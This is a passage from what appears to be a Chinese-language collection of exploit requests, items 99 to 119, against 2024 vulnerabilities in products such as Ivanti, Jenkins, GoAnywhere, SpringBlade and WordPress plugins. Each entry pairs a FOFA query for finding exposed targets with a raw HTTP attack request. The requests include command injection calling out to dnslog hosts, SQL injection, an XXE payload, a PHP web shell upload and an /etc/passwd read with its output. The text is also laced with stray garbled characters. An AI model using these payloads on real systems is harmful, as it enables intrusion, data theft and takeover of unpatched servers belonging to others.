1 f" s0 J7 p3 w( Q7 zAccept-Encoding: gzip, deflate
2 @5 k" u1 a9 o4 ~! c( QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) E0 y! |$ t; ]1 ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
) B( J6 _1 o5 o. NX-Requested-With: XMLHttpRequest
4 L$ Q& K( R, X I4 w! J
c9 T# q4 N1 G4 _3 V: h6 tid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
: j0 u+ a" L3 u/ S c3 m+ \ ~; ]1 _& w7 `) g8 `
+ F5 p( L5 ^# H' r2 \
99. Ncast盈可视高清智能录播系统busiFacade RCE0 s$ ~ H* p+ g& E
CVE-2024-03057 B% |" o9 m9 C& f6 ]
FOFA:app="Ncast-产品" && title=="高清智能录播系统"8 U- T z8 f2 X% O. {' x- v3 q4 T
POST /classes/common/busiFacade.php HTTP/1.16 t( a* [* k4 a! V" T
Host: 192.168.40.130:8080
3 T" B! ~; @9 i* ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ ^& R. ]7 i1 F( [6 x; ^
Connection: close
+ N( H- U" L* P9 h2 m( XContent-Length: 154& U4 _2 s6 C$ R9 T
Accept: */*4 G9 c, _) S% {1 ^2 l* R$ O3 G- u
Accept-Encoding: gzip, deflate
3 {) A6 K5 ?) _; T( `* WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) c2 g: [! d4 a$ y2 p ~5 ^" \Content-Type: application/x-www-form-urlencoded; charset=UTF-86 C9 d9 N3 n @
X-Requested-With: XMLHttpRequest
0 w' e1 I' c8 f0 P7 O+ R. b
8 ^" _; g. q v* a%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* _$ _, n; k+ U7 t. u! J; T C! T. i5 n
+ r0 t" t6 i% P' o6 n1 @: b100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ @4 H7 e. U, ]; V1 I
CVE-2024-0352
/ w: H4 _0 |9 ?9 Q9 SFOFA:icon_hash="874152924"& e( |5 K0 f! `0 \; d X# U
POST /api/file/formimage HTTP/1.14 D4 i# f7 a/ r! ?- V
Host: 192.168.40.1302 O8 k# n+ M+ N+ L7 K* y/ y; \
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
- V" Q/ ~6 ]+ P: L( GConnection: close' J. W2 w2 A; f: ^# w
Content-Length: 201
: j+ T: O7 M) \4 ~9 E" _9 iContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
& C/ m) R$ u9 J' hAccept-Encoding: gzip
7 c8 B* |3 C" F4 r
6 E! \: z1 A2 a1 \ a, Q------WebKitFormBoundarygcflwtei
; ]4 D0 f0 }5 u( [5 q8 C7 SContent-Disposition: form-data; name="file";filename="IE4MGP.php"1 G. I# B a9 O; X' Z1 H
Content-Type: application/x-php N+ p; o& L k( m& M0 q. c
2 F5 O% o5 f8 x; [2ayyhRXiAsKXL8olvF5s4qqyI2O
Q4 q2 R3 }) ]6 O$ r/ S- K------WebKitFormBoundarygcflwtei--
- N1 M" G7 S/ E* l
* a) v) T$ e4 o$ u5 a! t. n4 ^0 S! h0 S7 }
101. ivanti policy secure-22.6命令注入9 U# J; w O3 r7 @: B0 f6 y, B q% r
CVE-2024-21887) b' P! r& @8 Y' s H
FOFA:body="welcome.cgi?p=logo"
; v$ S' s4 C5 O& yGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
8 u& n1 Y8 Q. g! Z# V1 QHost: x.x.x.xx.x.x.x
0 @$ o1 h& P S- CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' R6 P; Y6 ?3 ?3 i1 _3 N/ gConnection: close
' l \( q* B, R" n7 x) ?Accept-Encoding: gzip
/ J8 w# @' h+ p8 {( x" k
6 }, P$ @2 ~7 R7 s3 G; S$ n0 L6 q% ~* }- b
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- k1 G- H3 J- F" CCVE-2024-21893, y: A% m# @$ I1 L8 B/ h
FOFA:body="welcome.cgi?p=logo". G$ j% F. v8 j) k
POST /dana-ws/saml20.ws HTTP/1.1
& c+ T: j2 @6 y2 N; O# z3 |Host: x.x.x.x
: l! Q0 S. b$ n/ L3 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: M# a9 L% `+ d3 k/ _- E3 t3 ZConnection: close$ k g% f& Y# h# Y% D6 r, X) J/ ^
Content-Length: 792
+ y% b) x) C8 O9 f: |Accept-Encoding: gzip
( a* |9 y9 P" j& x
/ ~: Q! v; |1 Q4 e' f/ q4 w/ h<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
( g0 r! M1 a0 S# o2 v4 Z
4 H6 z9 ]# T- z' {2 M8 }0 `$ t103. Ivanti Pulse Connect Secure VPN XXE3 r1 ~6 i+ u) v6 p" V
CVE-2024-22024
5 J1 q- w6 w6 K* v# C9 D0 [5 @5 zFOFA:body="welcome.cgi?p=logo"
. |8 _. Z) @1 s2 nPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
! E, ]7 o- o1 I) W' v, _# tHost: 192.168.40.130:111$ n$ e( _8 w' ?( l6 r' x# d
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( b9 N! n5 p5 _: a7 [
Connection: close
- V" W* u w6 v% T+ Y& o1 yContent-Length: 204. ?7 W; q1 p* i$ w/ P
Content-Type: application/x-www-form-urlencoded: a" ], b* ~+ i7 q* h! P
Accept-Encoding: gzip, ~6 B; U, p2 {' H/ W& A- N; r
- Z) i3 }) E, }7 M! R3 L2 M% j' u
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==6 \5 ^7 {3 h2 H p
. a" ^* ^" ~% S& V. w. u0 B, d! X, ]: O1 l- z+ v' Z
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
6 _3 z. V" w# u3 h8 Y<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>4 X+ r" y+ T7 _4 n2 I: _/ x
9 Q' u4 Q( T- a' b
% l7 O/ ?. l: p4 ?104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. @6 S, y$ _9 RCVE-2024-0569
- n r/ @( Y( \$ ]$ AFOFA:title="TOTOLINK"
8 i! F8 c1 k, q9 APOST /cgi-bin/cstecgi.cgi HTTP/1.1, Q- l/ ]6 Z, i( r, P; ?" q4 x
Host:192.168.0.1; I( n2 g! u9 \ i
Content-Length:41
) _$ v# `6 c/ i. K1 VAccept:application/json,text/javascript,*/*;q=0.01
$ G# B( W: F4 F v/ E6 m+ y; EX-Requested-with: XMLHttpRequest
# p( a/ s( k/ V# kUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
" i7 P8 [0 h" N2 PContent-Type: application/x-www-form-urlencoded:charset=UTF-8
, m I- I! m+ ^. cOrigin: http://192.168.0.13 i( @2 Y. A1 z+ H+ ~8 @
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
- j7 s" m& X' c& VAccept-Encoding:gzip,deflate
' K8 X2 z @1 |( q9 EAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
. h6 D2 A) `2 W- @( nConnection:close. A* O/ E5 J. l
8 t& M7 h5 F, x
{
1 Q/ ], c! r" t2 r! S8 s( I"topicurl":"getSysStatusCfg",# t) `" Y$ @$ i" _8 H
"token":""
7 P, A+ P) C5 A( e) D- M}
+ a1 g9 B9 o% k& D" ?
3 B* E3 J8 _) X$ P3 d105. SpringBlade v3.2.0 export-user SQL 注入8 ]9 n' i) e; J: y& @
FOFA:body="https://bladex.vip"
6 q4 \; @9 w/ M2 z: @http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
, _ a) ~' l' g# }1 T1 f6 a4 h6 J( l+ ]$ X
106. SpringBlade dict-biz/list SQL 注入
2 E! d- _/ ^8 M6 @FOFA:body="Saber 将不能正常工作"
; |4 y4 X8 u) W5 d! n2 x: [* p6 o3 ZGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1% Y+ q- C( [2 E/ D6 q* h3 {
Host: your-ip1 H! C: X6 b4 V: Z. U' f; u: G0 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 ^& |8 I4 y4 {; }0 E6 }Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
' A6 y' U7 e" O/ E. ]- s9 hAccept-Encoding: gzip, deflate
' B! j- _: D0 I, jAccept-Language: zh-CN,zh;q=0.9& u& ?5 _. Q" F9 S
Connection: close J! i; L/ G- T6 h1 `+ @
% ]" }& ~8 y) _& A/ `0 W# U
; n$ P+ d5 U2 L5 Y( v/ v; B
107. SpringBlade tenant/list SQL 注入
; c/ D7 |9 e G; yFOFA:body="https://bladex.vip"
4 J8 J/ f! D: N W& G* k. NGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ ]$ Y1 u5 K7 I2 d% }9 }Host: your-ip5 c5 R0 ~/ J$ i2 J/ }' u$ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% \! o9 z; l0 G1 fBlade-Auth:替换为自己的- F) g. O$ u( J! F) B
Connection: close
( }6 w1 K$ D2 I" ~; n3 ~# N7 g5 T7 {$ |9 m1 v/ Z3 H
3 i2 n9 a3 Z+ @/ h" g; c$ U2 R108. D-Tale 3.9.0 SSRF
. E4 F0 M l9 MCVE-2024-21642
2 }8 C. ^$ D l) I. oFOFA:"dtale/static/images/favicon.png"' P3 y, w9 [; x v+ Y7 l( z' c4 f
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1' P9 t- v9 g+ ~0 g; z, ~, t! [) F$ S
Host: your-ip! T7 \1 S `2 n4 d7 N
Accept: application/json, text/plain, */*
6 f5 A, Q- N; v7 ]- x; ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# K1 Y* I5 x6 ~/ }- C# L
Accept-Encoding: gzip, deflate
. j$ g/ T6 V8 d& E1 {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ _/ e" W& Z2 K# h+ n; i9 ~, O2 ^Connection: close
' H# X+ @8 h) H9 ^, x/ i4 y0 U. P0 R- ?
/ h4 {6 a1 K2 s& G109. Jenkins CLI 任意文件读取
9 B3 E1 I1 ]$ v( _5 o- F; ZCVE-2024-23897
^- b. D3 `* hFOFA:header="X-Jenkins"5 J' y- W3 J5 M
POST /cli?remoting=false HTTP/1.1( b& o+ o9 a' g2 {
Host:
7 m6 z. `3 s! n9 s5 r+ l- _Content-type: application/octet-stream
6 `+ }( g5 D5 U- S1 y. j- X5 A" rSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
K) r; P3 U) V" ESide: upload" E& i! H2 w0 S
Connection: keep-alive
6 d( H$ E; ]( V) k K3 KContent-Length: 163. K, ]4 s8 w6 N7 a" K( F
" q* p5 P8 v- s% m0 t6 Y7 W& w6 Bb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'' g( ~. e. |* k0 Y
. u2 u$ V: v; L/ n: ?" p+ A( @1 x5 S$ D( w' i
POST /cli?remoting=false HTTP/1.1
" ?+ L6 N8 c2 I7 C& L2 \( EHost:
# N f9 p' e* G% C4 D3 @5 U* TSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) b' g7 B- ?3 ?' L7 W8 }
download: F! ^4 ^& L; y( w" r0 {! l4 Y
Content-Type: application/x-www-form-urlencoded
! i3 @: g' U- N9 ~9 x: mContent-Length: 0+ l# o6 T0 [3 F( e# a
( J S* G. J4 r% A0 z
: @' B5 E& y+ ZERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# [, E% F% P' w! @7 x& \java -jar jenkins-cli.jar help
3 }! ?1 t1 B: \& d5 O[COMMAND]
+ c( Z C5 T8 L% R0 j8 FLists all the available commands or a detailed description of single command.$ T8 ~% N& E9 ^4 @0 n9 }
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)8 @, l! v o9 V3 G
8 ~8 K8 N$ T6 P' k7 K" Z( L8 m% ~" I. n
110. Goanywhere MFT 未授权创建管理员
4 e5 _1 E* ^+ ]; r* oCVE-2024-02040 I% q6 x8 _9 T b/ k
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"3 e5 V3 V! q# r# G1 m4 X
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
9 J1 d6 P+ z) I; e8 z- j* tHost: 192.168.40.130:8000
# d+ @# J a4 B9 i% y, vUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
9 f5 Y: X# Z& v$ W8 |Connection: close5 {! U6 W/ |2 I$ d- ?
Accept: */*
: j1 Y5 l1 P- g" Y8 ~& HAccept-Language: en
- d$ Q$ I5 R0 g; J/ Y) F; k3 J/ MAccept-Encoding: gzip8 O: `6 O8 D* O! [" X
2 ~6 U4 K3 M* h; V7 x9 N. u
6 l+ ]4 h0 g; B8 V
111. WordPress Plugin HTML5 Video Player SQL注入
6 h+ |$ ?. }2 v) R! W, ICVE-2024-1061; E: ^/ y% m/ y# h5 i8 E: T
FOFA:"wordpress" && body="html5-video-player"" E7 {& {7 x8 p# @+ M
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.19 g( x2 A: V0 f$ n- w" N+ ^5 C
Host: 192.168.40.130:1129 s0 l4 P' @& J7 g8 I }+ Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 m. L) s6 f! U8 A! f* `
Connection: close; f3 [! A1 B7 j3 ~9 e5 a$ F
Accept: */*
) ^9 Z3 j0 `+ V: M' R: kAccept-Language: en
+ T6 a* {) r$ _Accept-Encoding: gzip
1 @/ A* V! G* t9 A; f# \/ a. b* }7 c, i2 o
- R4 x4 D) }. \112. WordPress Plugin NotificationX SQL 注入
8 P- d. }' y9 O; D# t7 eCVE-2024-1698' V$ G4 n+ d* R, c. ~: h4 |9 J
FOFA:body="/wp-content/plugins/notificationx"
9 ^ @$ \0 P f' m2 HPOST /wp-json/notificationx/v1/analytics HTTP/1.1
; { ^7 l' J7 x" q/ UHost: {{Hostname}}
, q9 b* I: ]; z: ?Content-Type: application/json+ w8 F- U9 P. e M5 s9 R# p: S
& S7 J- ]! h" H: y7 M9 {; t* K
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}) r9 a) L& ]9 V+ I
/ g, b0 i# g- y" k! C0 m4 t
1 O* p1 ]7 V# A8 m5 M113. WordPress Automatic 插件任意文件下载和SSRF
* d0 ]6 |3 N% v6 O" ~3 h& W2 QCVE-2024-27954% }. L8 `6 N3 ?5 b$ L, V% l
FOFA:"/wp-content/plugins/wp-automatic"
2 |% J7 K; S6 y- K: `7 b4 F# QGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1# ]1 I: {2 {. N- Q( S
Host: x.x.x.x
, m' E9 ?, f, Q: I8 C1 OUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ F2 v* O2 F) F; Y. e+ R
Connection: close4 \, q* ^% R* }0 X; j- h
Accept: */*3 j$ o$ G o \, m- X
Accept-Language: en8 w3 Z6 n! s) \
Accept-Encoding: gzip
8 n/ A2 A# A! E: [& b* h \$ G% J) I
+ m& u, U8 q2 I0 v3 @114. WordPress MasterStudy LMS插件 SQL注入- E' _/ j: E/ z4 S
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"( g* ?; C3 g/ |2 R5 [, y9 |2 l
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.14 Y8 v' t5 r, @9 y1 m1 t
Host: your-ip
4 H3 N1 v) w3 c' o2 t4 j* kUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 F A* S& a( Y' {3 s; BAccept-Charset: utf-89 W4 d7 E1 v' e% I! Z' C" @! L
Accept-Encoding: gzip, deflate
) |, {" q& d' A: i- g1 mConnection: close
5 D4 t7 Z! x$ Z# v" `9 J( L; H0 y* A: Q9 |8 y* W3 Y( g
0 R4 |, F `$ q X8 N" L5 {
115. WordPress Bricks Builder <= 1.9.6 RCE
" h; A- ^# v0 }CVE-2024-25600& N$ d% {: p% d% `5 W
FOFA: body="/wp-content/themes/bricks/"
) q5 n5 @: g. |. M8 T# J第一步,获取网站的nonce值* _7 R# }0 _; y' a0 `
GET / HTTP/1.1& ^2 Z* H. H0 k! l/ I2 Y( a0 n' E
Host: x.x.x.x. z) T; a1 X2 v2 s I* e
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
& r' n$ q0 P- }" O- L' E) u; j5 mConnection: close% ^/ g( G- p* L E
Accept-Encoding: gzip
9 E2 r4 y: D0 A* i% t+ h4 p' j; [" K2 Y
: |4 U4 e/ w2 g; d/ K/ ?6 G9 p第二步替换nonce值,执行命令
: ^; e, ?4 a% c+ m) WPOST /wp-json/bricks/v1/render_element HTTP/1.1, r! u3 i2 K# Q: O J
Host: x.x.x.x
: q3 g: J4 J8 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ g3 Y9 f+ C. a7 w$ F# C, K
Connection: close3 V+ O; \' b/ W: F) B7 S
Content-Length: 356
. G# h9 Q8 Z1 T9 `3 ?8 O: tContent-Type: application/json
5 t S/ V! i. ?0 V7 l2 ~+ |% ~Accept-Encoding: gzip
: M d0 ]" t2 W& w' p2 V" _/ [
{
9 [* `! t9 R# }- i"postId": "1",. y- [- C7 K* U- Q/ ]
"nonce": "第一步获得的值",8 H6 l3 a4 Z5 n( C# b. Z( y$ z* f4 t" z
"element": {- K& g' Z9 f. ^. {. [* N% k0 X
"name": "container",
( F! D9 }3 i5 D "settings": {% j$ Z3 ^5 E4 h1 K% x; n
"hasLoop": "true", J( @/ Y1 `! z3 H% y! Z
"query": {
, x6 m3 B+ a z' ?8 Z "useQueryEditor": true,
( D" Q2 r7 D) x! [6 u7 t W "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",9 h Q s. `0 r% l
"objectType": "post"
9 _0 b: Y: m2 a, _: a: @( y# u }; F, @6 |2 }6 H$ A. @9 p
}
' {6 b' x+ T7 p* }5 t }
0 k+ @+ o* v- y; h" x" t* B- N}9 P; u$ h$ G0 }. `! E v$ a* a
; N9 f5 W2 b6 O t4 ^
$ f5 d$ Z1 _ a$ Q6 H" v7 s! G116. wordpress js-support-ticket文件上传
7 f0 k$ B# Y2 l3 ]& yFOFA:body="wp-content/plugins/js-support-ticket"
, g5 B1 g- t0 O0 FPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.10 C; C% L6 T1 {4 o! Z
Host:
- e' v2 R( w. L/ p6 b" s) [Content-Type: multipart/form-data; boundary=--------767099171
% C' j1 y- q' i$ kUser-Agent: Mozilla/5.0) W* w! [3 Y% `2 v l8 o( L. k
' R6 f& O, f) o1 P/ d
----------767099171
, S0 a1 {8 j- {* R- @# T3 tContent-Disposition: form-data; name="action"
8 q! a% s4 Z. zconfiguration_saveconfiguration
5 m, U; J x1 {----------767099171- U$ j% W" g% g9 [% m9 [% v7 p
Content-Disposition: form-data; name="form_request"& o5 R t& d T" s$ s8 I- h
jssupportticket
5 F- E: o8 T0 j+ b% G3 P7 V----------767099171
; z# V& e2 |+ LContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php", I( `+ c' X. \* ]' z
Content-Type: image/png0 m1 `+ [ O; O3 N+ P2 b
----------767099171--
q( N. e& q" G; {/ F; M9 w2 c7 ]& v+ q( n' A
. Z/ B, [" }6 {117. WordPress LayerSlider插件SQL注入
& ^% A. P7 A8 N: Tversion:7.9.11 – 7.10.0
+ ?; k- B# j7 ?: e9 O7 gFOFA:body="/wp-content/plugins/LayerSlider/"4 o$ {) |) R5 G" y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
9 W/ E" z* y+ O( A* DHost: your-ip3 S! I4 O# o/ B5 V D, L! _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 E0 G' Y- M; o; d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 h/ \6 ^( ^6 K' p, n ]# k# n$ i4 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 N) J$ }* ^, m' [Accept-Encoding: gzip, deflate, br
: a' l! r) D' m) YConnection: close
) e9 g; f" D# j. U: s* nUpgrade-Insecure-Requests: 1; n9 x0 }- ?; Z9 r2 l( A; y* ?6 \
4 Q# O* \* y; e2 g' m0 d W/ c0 {
+ s2 w9 V8 b8 ]118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' r/ N" R( T: p2 N
CVE-2024-09392 x1 Y& z2 W. h, w
FOFA:title="Smart管理平台"
$ `# ^; ^: E9 b8 MPOST /Tool/uploadfile.php? HTTP/1.1
2 S( @! P3 L3 e, H M O4 Y5 lHost: 192.168.40.130:8443% Z; H0 m, Y! c2 W
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f85 n* H% n6 m: G0 h; p( S; n t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0! X. g4 r" ^# L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. u9 D+ ?' m( ?9 \: k: c0 f5 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: F0 D( `+ ?9 Q2 w# E# s! oAccept-Encoding: gzip, deflate% t3 q+ @* `. [1 r9 u7 `" [" T, l0 c
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887- v1 T- Q! O6 n
Content-Length: 405# m( k3 ]& I P$ ]/ Z/ \
Origin: https://192.168.40.130:8443
5 g% S/ z2 H' D3 cReferer: https://192.168.40.130:8443/Tool/uploadfile.php" `$ k0 O; M5 f$ v
Upgrade-Insecure-Requests: 1
. Z( u6 V4 z' }; \Sec-Fetch-Dest: document% D6 ^8 V, e( I' S/ s
Sec-Fetch-Mode: navigate
' e F3 b* |6 [+ S @+ F% hSec-Fetch-Site: same-origin4 m' W( Z5 M e3 n. k7 O* Y
Sec-Fetch-User: ?1: T& B9 A9 x S
Te: trailers* C4 C) D7 |/ r/ D% P
Connection: close* D, X ^+ l2 ~( o6 j! M) M8 v6 n
* S1 ~2 q1 |3 Y5 V7 w1 ^
-----------------------------13979701222747646634037182887
8 w- e# H% G( d9 x" y G) g# F% IContent-Disposition: form-data; name="file_upload"; filename="contents.php"& p' L8 R8 h# f# V( c* u
Content-Type: application/octet-stream
3 N' B0 Y* B' ~' D* `% Z, c% Z0 X
<?php
0 c8 z& J: v1 o( G8 |$ Rsystem($_POST["passwd"]);
2 j; j- _2 z' P$ ]0 d# V?>! Q( K$ ?8 y8 z9 Q# {1 `* G0 R
-----------------------------13979701222747646634037182887
, U1 T5 q1 @3 p! u9 \3 TContent-Disposition: form-data; name="txt_path"$ ^1 c3 B* I5 L
9 g) _( j8 ?' T+ l" B
/home/src.php) d- Y; Z( g. |% l+ M+ C3 y& s
-----------------------------13979701222747646634037182887--
* Q5 S, `7 L/ u; \5 k# B
1 c5 A) O2 ]1 f! E- `5 f
8 F* Z, ^+ q% o3 u' B& i- P0 ?访问/home/src.php
9 a' P, M6 Q1 K4 p u
3 ?% `' D7 r. G& E5 E1 [. o: \119. 北京百绰智能S20后台sysmanageajax.php sql注入' F; H; b2 J: z
CVE-2024-12540 m3 ~8 M2 y7 d# O* A
FOFA:title="Smart管理平台"
4 C7 a6 v. c; \7 S- o( C' V先登录进入系统,默认账号密码为admin/admin5 ^9 O; z5 u3 j
POST /sysmanage/sysmanageajax.php HTTP/1.11
6 S. A* t9 @4 aHost: x.x.x.x
; b9 B, S: M% u. q4 I! ^Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
( ~$ G$ J5 j$ I( {1 m$ u3 L( D& g$ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
0 m4 t7 `) k* g$ p2 n4 @' W: EAccept: */*, P! \" _ |% u4 r, y0 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 S' o! [3 ]8 }# u1 |2 NAccept-Encoding: gzip, deflate# ]4 r% p" R) m
Content-Type: application/x-www-form-urlencoded;
0 T3 P- U1 j$ K% z0 uContent-Length: 109
% l! d; K. X$ w7 X3 BOrigin: https://58.18.133.60:8443
2 D7 a* y9 a0 g6 \+ ?) vReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
$ S) w5 B; D9 `4 [Sec-Fetch-Dest: empty; b" X( ~) S q5 X
Sec-Fetch-Mode: cors6 w4 Z' @" h' e6 z$ W
Sec-Fetch-Site: same-origin
* I+ o- I$ W% h$ h, C' g1 ZX-Forwarded-For: 1.1.1.1
# Z& `: f1 w4 h7 f7 T! `/ C8 NX-Originating-Ip: 1.1.1.1
